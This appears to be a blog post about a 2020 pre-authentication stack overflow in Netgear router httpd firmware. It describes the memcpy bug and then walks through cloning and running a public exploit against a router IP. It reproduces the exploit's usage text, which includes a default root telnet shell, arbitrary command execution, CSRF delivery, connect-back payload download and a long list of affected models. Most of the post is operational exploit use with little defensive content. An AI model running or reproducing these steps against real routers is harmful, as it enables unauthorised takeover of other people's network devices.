Netgear Remote Code Execution Exploit

While I was doing routine maintenance of my wireless router, I noticed there’s a firmware update that fixed a RCE bug in the Netgear router. After some research on the Internet, it looks like the Netgear vulnerability is fairly new (disclosed in June, 2020) one. Many Netgear router models are impacted by this exploit, such as the popular R and WNDR series.

The Netgear exploit itself uses pre-authentication memcpy-based stack overflow, to allow a network-based attacker gain root access on the router. The exploit can start telnet on TCP port 8888, or carry any additional payload.

Before parsing generic HTTP requests, httpd checks to see if the provided HTTP request is part of the update process. If so, a separate request parser is used, as compared to the generic request parser. If this parser decides that the request is sending a firmware blob to update, the function abCheckBoardID (at offset 0x1BA78 in the httpd from the R7000 V1.0.9.12_1.2.23 firmware image) will be called to validate the POST’d image before upgrading. If the image begins with the string “*#$^”, the image will be parsed and a header will be copied to a stack variable. The length of the header will be taken from bytes 5-8 of the image and is not checked before the vulnerable memcpy (at offset 0x1BB18). Thus, by setting a size larger than the stack buffer, an attacker can overflow it and corrupt the saved registers. Further, because the overflow is memcpy based, the exploit is not limited by any encoding restrictions.

https://github.com/grimm-co/NotQuite0DayFriday

To run the exploit for the Netgear models,

$ git clone https://github.com/grimm-co/NotQuite0DayFriday
$ cd NotQuite0DayFriday/2020.06.15-netgear
$ python exploit.py 192.168.1.1

The exploit can run additional commands (besides /bin/utelnetd -p8888 -l/bin/sh -d), and ask the target to connect back to an IP to get payload.

usage: exploit.py [-h] [-command COMMAND] [-csrf] [-https] [-file]
                  [-port PORT] [-model MODEL] [-version VERSION]
                  [-local_ip LOCAL_IP] [-version-only]
                  ip
positional arguments:
  ip                  The IP address of the webserver to exploit

optional arguments:
  -h, --help          show this help message and exit
  -command COMMAND    The command to run; default is to start telnet on port 8888 (or 3333 if 8888 is already used)
  -csrf               Run a web server that sends the exploit as a CSRF                       payload
  -https              Run the exploit against a webserver running HTTPS
  -file               Write the exploit firmware to a file (which typically
                      has a file extension .chk). Use the ip argument to
                      specify the filename.
  -port PORT          The port of the webserver to exploit
  -model MODEL        The model of the webserver to exploit (default
                      autodetect). Supported models are: EX6920, WNDR3400V2,
                      R6400V2, R8300, R6700V3, MBR1200, WNDR3300V2, EX3800,
                      WNR3500L, R4500, D6400, WNR1000V3, EX6150, WNDR3400V3,
                      D8500, RS400, EX6130, WNCE3001, WNR3500, R7900,
                      MVBR1210C, XR300, EX7000, R8500, R6900, EX6200,
                      WNR3500V2, R6400, WNDR4000, R6200, R8000, LG2200D,
                      DGN2200M, D7000V2, WNR3500LV2, WNDR4500V2, AC1450,
                      WNDR3400, WN2500RP, WNDR3300, WN3100RP, D6300,
                      WNR2000V2, R7850, R6200V2, WGR614V9, D6220, R6700,
                      MBR624GU, WN3000RP, R7000, WNR834BV2, DC112A,
                      WNDR3700V3, R6300, EX6000, EX3700, R6250, R7100LG,
                      EX3920, DGN2200, R6300V2, WN3500RP, EX6120, WGR614V8,
                      WGR614V10, WGT624V4, EX6100, DGND3700, MBRN3000,    MBM621, WNDR4500, R6900P, R7000P, WN2500RPV2, DGN2200V4, MBR1516, MBR1515, R7300
  -version VERSION    The version of the webserver to exploit (default autodetect). 
  -local_ip LOCAL_IP  The IP address the exploited host should connect back to  download a payload, only used on the devices: WNR3500, WNCE3001 (default autodetect).
  -version-only       Only detect the model/version of a device, don't exploit

You should note that once the exploit is successful, the httpd server of the router will go down. Power cycling the router should bring the web server back.

Leave a Reply